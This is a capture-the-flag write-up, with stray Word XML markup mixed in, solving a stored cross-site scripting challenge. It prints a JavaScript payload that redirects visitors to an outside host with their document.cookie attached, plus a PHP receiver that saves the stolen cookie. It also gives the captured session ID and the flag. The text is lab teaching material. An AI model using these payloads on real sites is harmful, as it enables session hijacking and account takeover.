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First, register an account and login to see the actual pages.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hint asks you what happens when you create a new page with HTML; I will the example below to show what happens.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4357688" cy="3632779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57688" cy="36327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After Creating the page and viewing it...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2997200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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As you can see, when you create a new page with HTML in it, the HTML will be displayed. We can use this feature to exploit the site by doing some </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross Site Scripting/XSS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (google it).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thing is that you’re not supposed to find the moderator’s password, you’ll see that there’s a cookie called PHPSESSID and what you’re supposed to do is steal the moderator’s cookie via XSS.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To do so, you make a page with javascript that redirects the viewer to another page with php on it and stuff. There’s apparently a way to do this without php but I couldn’t figure it out. To use php, you’ll need a php server and I didn’t feel like installing one to solve the problem.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Luckily, I met someone that had his own site with php installed.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His php code was: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&lt;?php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error_reporting(-1);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 $myfile = fopen("/var/www/html/cookie", "w")  or die("Unable to open file!");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print $_GET["mine"];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fwrite($myfile, $_GET["mine"]);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?&gt;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Then, this is what I type into the new page that I will create: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&lt;script&gt;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ab/>
        <w:tab/>
        <w:t xml:space="preserve">window.location.replace(‘http://the guy’s website.com/sps.php?cookie=” ‘ + document.cookie + ‘“‘);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ab/>
        <w:t xml:space="preserve">&lt;/script&gt;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Then I copy the page id and edit the Report element to change the id to the page id that I want to report and click the report button.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Once I report, I visit another page where the php code will write the moderator’s cookie.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he cookie was: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"PHPSESSID=61ma80euob1vc9c4q7io8d0pk0"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Then I just inject that cookie into my browser and view the page that the problem was asking about and it alerts you with the flag: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wow_cross_site_scripting_is_such_web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Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image03.png"/></Relationships>
</file>